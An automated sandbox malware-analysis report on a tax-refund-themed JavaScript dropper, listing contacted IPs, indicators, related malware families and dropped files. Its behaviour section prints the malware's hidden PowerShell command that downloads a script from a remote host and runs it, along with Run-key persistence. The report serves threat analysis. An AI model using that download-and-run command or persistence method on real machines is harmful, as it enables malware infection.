https://lens.google.com/v3/upload2	chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore68	powershell.exe, 00000001.00000002.1887820190.00000272260C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2125755339.000002E390A39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2125755339.000002E390A4D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/b	chrome.exe, 0000000B.00000003.1926075173.000029E000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/https://google-ohttp-relay-join.fastly-edge.com/	chrome.exe, 0000000B.00000003.1951666580.000029E001470000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1951507573.000029E001454000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/2(	chrome.exe, 0000000B.00000003.1926075173.000029E000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	false		high
https://themes.googleusercontent.com	wscript.exe, 00000000.00000002.1660167889.0000024B549F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1660396457.0000024B54E60000.00000004.00000020.00020000.00000000.sdmp	false		high
https://nonexistent.googlezip.net/OfflinePagesPrefetchingForcedOn_OfflinePagesPrefetchingOfflinePage	chrome.exe, 0000000B.00000003.1925510952.000029E0012F8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.ebuddy.com	MSBuild.exe	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
162.159.61.3	chrome.cloudflare-dns.com	United States	13335	CLOUDFLARENETUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
195.133.78.18	unknown	Russian Federation	21453	FLEX-ASRU	true
160.153.175.102	102.175.153.160.host.secureserver.net	United States	21501	GODADDY-AMSDE	true
188.114.96.3	paste.ee	European Union	13335	CLOUDFLARENETUS	false
178.237.33.50	geoplugin.net	Netherlands	8455	ATOM86-ASATOM86NL	false
142.250.186.97	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false
172.64.41.3	unknown	United States	13335	CLOUDFLARENETUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1584330
Start date and time:	2025-01-05 08:31:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 5s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	29
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled GSI enabled (Javascript) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Tax_Refund_Claim_2024_Australian_Taxation_Office.js
Detection:	MAL
Classification:	mal100.rans.phis.troj.spyw.expl.evad.winJS@57/222@17/9
EGA Information:	Successful, ratio: 80%
HCA Information:	Successful, ratio: 99% Number of executed functions: 182 Number of non-executed functions: 344
Cookbook Comments:	Found application associated with file extension: .js

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe
Excluded IPs from analysis (whitelisted): 2.19.224.32, 4.245.163.56, 199.232.214.172, 192.229.221.95, 52.165.164.15, 13.95.31.18, 13.107.42.16, 204.79.197.203, 204.79.197.239, 13.107.21.239, 216.58.212.174, 13.107.6.158, 20.190.159.64, 20.190.159.4, 20.190.159.75, 40.126.31.73, 20.190.159.68, 20.190.159.73, 40.126.31.71, 20.190.159.71, 98.64.238.3, 2.16.168.107, 2.16.168.113, 23.56.254.164, 104.17.201.1, 104.17.202.1, 142.251.35.163, 142.251.40.195, 142.251.32.99, 142.250.176.195, 65.52.241.40, 23.200.0.34, 13.107.246.40, 13.107.246.45
Excluded domains from analysis (whitelisted): nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, data-edge.smartscreen.microsoft.com, fs-wildcard.microsoft.com.edgekey.net, clients2.google.com, ocsp.digicert.com, config-edge-skype.l-0007.l-msedge.net, login.live.com, e16604.g.akamaiedge.net, e1315.dsca.akamaiedge.net, www.gstatic.com, l-0007.l-msedge.net, wu-b-net.trafficmanager.net, fs.microsoft.com, prod-atm-wds-edge.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, edgeassetservice.azureedge.net, clients.l.google.com, www.tm.lg.prod.aadmsa.trafficmanager.net, config.edge.skype.com.trafficmanager.net, otelrules.afd.azureedge.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, prod.fs.microsoft.com.akadns.net, config.edge.skype.com, glb.sls.prod.dcat.dsp.trafficmanager.net, edge-microsoft-com.dual-a-0036.a-msedge.net, prdv4a.aadg.msidentity.com, bzib.nelreport
Execution Graph export aborted for target powershell.exe, PID 7796 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtWriteVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:32:00	API Interceptor	118x Sleep call for process: powershell.exe modified
02:32:33	API Interceptor	2x Sleep call for process: svchost.exe modified
02:32:57	API Interceptor	1786939x Sleep call for process: MSBuild.exe modified
07:32:20	Task Scheduler	Run new task: TaskName path: powershell.exe s>-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://102.175.153.160.host.secureserver.net/file.js' -OutFile 'C:\\ProgramData\smudgy.js'; Start-Process 'C:\\ProgramData\smudgy.js'"
07:32:21	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Path hpiCiWTCNopizuWaGzCt\hpiCiWTCNopizuWaGzCt.vbs
07:32:30	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Path hpiCiWTCNopizuWaGzCt\hpiCiWTCNopizuWaGzCt.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
162.159.61.3	Yoranis Setup.exe	Get hash	malicious	Unknown	Browse
	random.exe	Get hash	malicious	Unknown	Browse
	random.exe	Get hash	malicious	Unknown	Browse
	http://www.cipassoitalia.it/	Get hash	malicious	CAPTCHA Scam ClickFix	Browse
	Setup.exe.7z	Get hash	malicious	Unknown	Browse
	over.ps1	Get hash	malicious	Vidar	Browse
	MJhe4xWsnR.msi	Get hash	malicious	Unknown	Browse
	MJhe4xWsnR.msi	Get hash	malicious	Unknown	Browse
	6684V5n83w.exe	Get hash	malicious	Vidar	Browse
	Bp4LoSXw83.lnk	Get hash	malicious	Unknown	Browse
239.255.255.250	https://bit.ly/3VYGxmh	Get hash	malicious	CAPTCHA Scam ClickFix, Phisher	Browse
	Yoranis Setup.exe	Get hash	malicious	Unknown	Browse
	Yoranis Setup.exe	Get hash	malicious	Unknown	Browse
	4XYAW8PbZH.exe	Get hash	malicious	Remcos	Browse
	phishingemail.eml	Get hash	malicious	Unknown	Browse
	phishingtest.eml	Get hash	malicious	Unknown	Browse
	http://livedashboardkit.info	Get hash	malicious	Unknown	Browse
	iGhDjzEiDU.exe	Get hash	malicious	Remcos	Browse
	random.exe	Get hash	malicious	Unknown	Browse
	random.exe	Get hash	malicious	Unknown	Browse
188.114.96.3	Gg6wivFINd.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	unasnetds.ru/eternalPython_RequestUpdateprocessAuthSqlTrafficTemporary.php
	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/u7ghXEYp/download
	CV_ Filipa Barbosa.exe	Get hash	malicious	FormBook	Browse	www.mffnow.info/1a34/
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	www.mydreamdeal.click/1ag2/
	SWIFT COPY 0028_pdf.exe	Get hash	malicious	FormBook	Browse	www.questmatch.pro/ipd6/
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/I7fmQg9d/download
	need quotations.exe	Get hash	malicious	FormBook	Browse	www.rtpwslot888gol.sbs/jmkz/
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/Bh1Kj4RD/download
	http://kklk16.bsyo45ksda.top	Get hash	malicious	Unknown	Browse	kklk16.bsyo45ksda.top/favicon.ico
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/XrlEIxYp/download

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
chrome.cloudflare-dns.com	Yoranis Setup.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	Yoranis Setup.exe	Get hash	malicious	Unknown	Browse	162.159.61.3
	random.exe	Get hash	malicious	Unknown	Browse	162.159.61.3
	random.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	http://www.cipassoitalia.it/	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	162.159.61.3
	EwpsQzeky5.msi	Get hash	malicious	Unknown	Browse	172.64.41.3
	Setup.exe.7z	Get hash	malicious	Unknown	Browse	172.64.41.3
	over.ps1	Get hash	malicious	Vidar	Browse	162.159.61.3
	MJhe4xWsnR.msi	Get hash	malicious	Unknown	Browse	162.159.61.3
	MJhe4xWsnR.msi	Get hash	malicious	Unknown	Browse	172.64.41.3
paste.ee	mniscreenthinkinggoodforentiretimegoodfotbusubessthings.hta	Get hash	malicious	Cobalt Strike	Browse	104.21.84.67
	bad.txt	Get hash	malicious	AsyncRAT	Browse	104.21.84.67
	BBVA S.A..vbs	Get hash	malicious	Remcos	Browse	104.21.84.67
	greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	172.67.187.200
	seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	104.21.84.67
	sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	172.67.187.200
	createdbetterthingswithgreatnressgivenmebackwithnice.hta	Get hash	malicious	Cobalt Strike, FormBook	Browse	104.21.84.67
	givenbestupdatedoingformebestthingswithgreatnewsformegive.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	104.21.84.67
	clearentirethingwithbestnoticetheeverythinggooodfrome.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	172.67.187.200
	PO_0099822111ORDER.js	Get hash	malicious	Remcos	Browse	104.21.84.67
geoplugin.net	c2.hta	Get hash	malicious	Remcos	Browse	178.237.33.50
	4XYAW8PbZH.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	iGhDjzEiDU.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	1.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	heteronymous.vbs	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	2LDJIyMl2r.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	1evAkYZpwDV0N4v.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	94e.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	94e.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
bg.microsoft.map.fastly.net	N5kEzgUBn6.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	199.232.210.172
	setup64v9.3.4.msi	Get hash	malicious	Unknown	Browse	199.232.210.172
	KpHYfxnJs6.exe	Get hash	malicious	Blank Grabber	Browse	199.232.210.172
	c2.hta	Get hash	malicious	Remcos	Browse	199.232.214.172
	phishingtest.eml	Get hash	malicious	Unknown	Browse	199.232.214.172
	a36r7SLgH7.exe	Get hash	malicious	AsyncRAT	Browse	199.232.214.172
	3lhrJ4X.exe	Get hash	malicious	LiteHTTP Bot	Browse	199.232.214.172
	2Mi3lKoJfj.exe	Get hash	malicious	Quasar	Browse	199.232.210.172
	Reparto Trabajo TP4.xlsm	Get hash	malicious	Unknown	Browse	199.232.210.172
	file.exe	Get hash	malicious	DcRat, JasonRAT	Browse	199.232.214.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
FLEX-ASRU	i.elf	Get hash	malicious	Gafgyt	Browse	195.133.52.175
	176.119.150.11-i-2025-01-04T15_20_35.elf	Get hash	malicious	Gafgyt, Mirai	Browse	195.133.52.175
	2.elf	Get hash	malicious	Unknown	Browse	94.253.22.15
	linux_i386.elf	Get hash	malicious	Unknown	Browse	195.133.11.40
	i486.elf	Get hash	malicious	Mirai	Browse	94.253.22.179
	jade.spc.elf	Get hash	malicious	Mirai	Browse	94.253.22.192
	linux_amd64.elf	Get hash	malicious	Unknown	Browse	195.133.11.40
	xd.spc.elf	Get hash	malicious	Mirai	Browse	195.58.43.108
	ppc.elf	Get hash	malicious	Unknown	Browse	195.133.53.106
	hmips.elf	Get hash	malicious	Unknown	Browse	195.133.53.106
CLOUDFLARENETUS	X9g8L63QGs.exe	Get hash	malicious	Blank Grabber	Browse	162.159.137.232
	KpHYfxnJs6.exe	Get hash	malicious	Blank Grabber	Browse	162.159.137.232
	https://bit.ly/3VYGxmh	Get hash	malicious	CAPTCHA Scam ClickFix, Phisher	Browse	104.18.95.41
	armv6l.elf	Get hash	malicious	Unknown	Browse	198.41.197.77
	Yoranis Setup.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	Yoranis Setup.exe	Get hash	malicious	Unknown	Browse	104.26.13.205
	file.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	file.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	104.21.64.1
	J18zxRjOes.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	SOElePqvtf.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
CLOUDFLARENETUS	X9g8L63QGs.exe	Get hash	malicious	Blank Grabber	Browse	162.159.137.232
	KpHYfxnJs6.exe	Get hash	malicious	Blank Grabber	Browse	162.159.137.232
	https://bit.ly/3VYGxmh	Get hash	malicious	CAPTCHA Scam ClickFix, Phisher	Browse	104.18.95.41
	armv6l.elf	Get hash	malicious	Unknown	Browse	198.41.197.77
	Yoranis Setup.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	Yoranis Setup.exe	Get hash	malicious	Unknown	Browse	104.26.13.205
	file.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	file.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	104.21.64.1
	J18zxRjOes.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	SOElePqvtf.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
GODADDY-AMSDE	https://zxptech.com	Get hash	malicious	Unknown	Browse	160.153.0.33
	https://www.amtso.org/check-desktop-phishing-page/	Get hash	malicious	Unknown	Browse	160.153.0.9
	https://www.amtso.org/check-desktop-phishing-page/	Get hash	malicious	Unknown	Browse	160.153.0.9
	http://rdsdelivery.com	Get hash	malicious	Unknown	Browse	160.153.0.101
	arm7.elf	Get hash	malicious	Mirai, Gafgyt	Browse	188.121.44.175
	El9HaBFrFM.exe	Get hash	malicious	Blank Grabber	Browse	160.153.155.187
	https://sunwardamerica.com/avatar/0.png/	Get hash	malicious	Unknown	Browse	160.153.0.47
	http://218.203.148.37.host.secureserver.net/?BLzDqtOtKg=YbkczbGNvZWxob0BlZW0ucHQ=	Get hash	malicious	Unknown	Browse	37.148.203.218
	myfile.exe	Get hash	malicious	Sodinokibi, Chaos, Netwalker, Revil, TrojanRansom	Browse	160.153.0.174
	firmware.x86_64.elf	Get hash	malicious	Unknown	Browse	160.153.0.44

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	c2.hta	Get hash	malicious	Remcos	Browse	160.153.175.102 188.114.96.3
	3lhrJ4X.exe	Get hash	malicious	LiteHTTP Bot	Browse	160.153.175.102 188.114.96.3
	CEFA-FAS_LicMgr.exe	Get hash	malicious	Unknown	Browse	160.153.175.102 188.114.96.3
	same.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar, XWorm	Browse	160.153.175.102 188.114.96.3
	m.txt.ps1	Get hash	malicious	Unknown	Browse	160.153.175.102 188.114.96.3
	XClient.exe	Get hash	malicious	XWorm	Browse	160.153.175.102 188.114.96.3
	1111.hta	Get hash	malicious	Unknown	Browse	160.153.175.102 188.114.96.3
	qwertyuiopasdfghjklzxcvbnm.hta	Get hash	malicious	Unknown	Browse	160.153.175.102 188.114.96.3
	W2k2NLSvja.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	160.153.175.102 188.114.96.3
37f463bf4616ecd445d4a1937da06e19	c2.hta	Get hash	malicious	Remcos	Browse	188.114.96.3
	file.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	188.114.96.3
	J18zxRjOes.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	HGwpjJUqhW.exe	Get hash	malicious	GhostRat	Browse	188.114.96.3
	http://www.cipassoitalia.it/	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	188.114.96.3
	nv8401986_110422.exe	Get hash	malicious	Qjwmonkey	Browse	188.114.96.3
	adguardInstaller.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	adguardInstaller.exe	Get hash	malicious	PureLog Stealer	Browse	188.114.96.3
	RisingStrip.exe	Get hash	malicious	Vidar	Browse	188.114.96.3

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0xd5ab43e7, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.42213614797959476
Encrypted:	false
SSDEEP:	1536:BSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Baza/vMUM2Uvz7DO
MD5:	4B1C30F38636370FC7F273F5DEAE6D7A
SHA1:	97242DED7E490D5CD7190F0CD264E5B49D2B1131
SHA-256:	4980875CB9A79233A3FFBABCA37FC0CB204D674237B567826A0601E80ED1E688
SHA-512:	33FD1EBDB0DC468333B92DC28F8529F923D168AB4178A45C7A66C30C82CFA171E0BB52AFD044112FFBDAE50EABDAC65C64DB6677C4DACE44034C628F8633289D
Malicious:	false
Preview:	.C.... .......A.......X\...;...{......................0.!..........{A.! ...}..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{....................................k." ...}....................T.! ...}c..........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\smudgy.js

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 text, with very long lines (396), with CRLF line terminators
Category:	dropped
Size (bytes):	168267
Entropy (8bit):	5.133970530064455
Encrypted:	false
SSDEEP:	3072:ss9h2h9kGVAsiKLunyzQ6VqQlhIcVOW0B:lsiKLuJ
MD5:	0F82E2113D82C081444EBCFE7B1E05E7
SHA1:	9AFEC3EEB6F0B324808C367797A3EC2ECD5D892D
SHA-256:	E971A59151352C76DEE0829AEF320E8BB5C251A14D4C79125B8E37CC54B054A0
SHA-512:	8F6FAC776B97E5701FF3F8E2D1BF608F1F84CE63495F626E3E4462A2BB88E53B6EA87D0B9D93A53D65FA4D42C587E4A79A1F5A0CFF7AB456BDE89F81C8AB09D0
Malicious:	true
Preview:	..var basketcases = "http://schemas.microsoft.com/windows/2003/08/printing/printschemakeywords";..var pyrry = "http://schemas.microsoft.com/windows/2013/05/printing/printschemakeywordsv11";..var alebench = "http://schemas.microsoft.com/windows/2013/12/printing/printschemakeywordsv12";..var psf2Ns = "http://schemas.microsoft.com/windows/2013/12/printing/printschemaframework2";..var tentaculicyst = "http://schemas.microsoft.com/windows/2003/08/printing/printschemaframework";..var batholith = "http://www.w3.org/2001/XMLSchema-instance";..var presciences = "http://www.w3.org/2001/XMLSchema";..var parchmenty = "http://schemas.microsoft.com/windows/2015/02/printing/printschemakeywords/microsoftprinttopdf";....// Criar o XML DOM para WSH..var cherimoyer = new ActiveXObject("Microsoft.XMLDOM");..cherimoyer.async = false;....// Carregar um exemplo de XML (voc. deve substituir isso pelo seu XML real)..var trimillennials = '<psf:PrintTicket xmlns:psf="' + tentaculicyst + '" xmlns:xsi="' + bathol

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	2278
Entropy (8bit):	3.8618915794441415
Encrypted:	false
SSDEEP:	48:uiTrlKxrgxtxl9Il8urWIS0luJZajOH83Yn4RJiDd1rc:mIYdxJlunH8I4Rz
MD5:	34F31B67278C0C1B047FB2388673C6B1
SHA1:	3DF36A949705AAEBFDC800D64E0FF36E2011E497
SHA-256:	E8C3BF3EA8A646F55C643EF4860725210EDEFA25AC54DD817E3DD95195EBE635
SHA-512:	4B3422ED9ABB72A4EFE63E46B4958A0EEEE5A5CB6881D417B406D36FA6295D6D8EF8920C55A45B7306F732D91FAF34A27646BC96F13E035C82125C0480BCB218
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.F.p.d.Y.k.x.f.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.0./.6.4.p.o.

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4622
Entropy (8bit):	3.9997361496941575
Encrypted:	false
SSDEEP:	96:iYdR6ukOcDlupR6Ye+cKhCJ23PXsO7TzRpqoXY:iM2XD6R5AJ23PXhry
MD5:	D199CFB3C9C2CC442B95335E3B152FBB
SHA1:	A68E0976F827E83095E8E3751A22CB072C8B6F0D
SHA-256:	5695E1D6CA06DCD547078FBBF37EE3080AFA2DF1EF7AA509AF79DB866A2B7A19
SHA-512:	48247BE4DC9A5E3DA22425EEFAE6758B158CC0F55D69C7206486DFFECB6BC75125D5C9FF3BAA769EFF1C73F841214A788D46763EB41D275C63F58BDAFBE76420
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".y.7.U.7.S.E.R.f.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.0./.6.4.p.o.

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	2684
Entropy (8bit):	3.908126722841047
Encrypted:	false
SSDEEP:	48:uiTrlKx68Wa7xnxl9Il8urCtAQljjM0BlUekdXQmdrs2gAUGfcCd/vc:aJYdWAQlM0BlUJwnbG8
MD5:	490F724A2A985C61843A6AF3A731B6CD
SHA1:	8CA6F29009F7482B6D24151D0F72D5268A5C5510
SHA-256:	F8BE44F72CBF70470EA7DF6EA365CD873A0C051D7A7AF2976F135719B71DD1E7
SHA-512:	3908ADD57C75070F2201523626D9846BC5A693CF0113FEDC7A3670E10C84DBC6F506F9F87D51F842A9B80EC28287C16CBEDDB44075E4A82B1E44AD671149F5B0
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".C.U.y.J.d.x.V.+.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V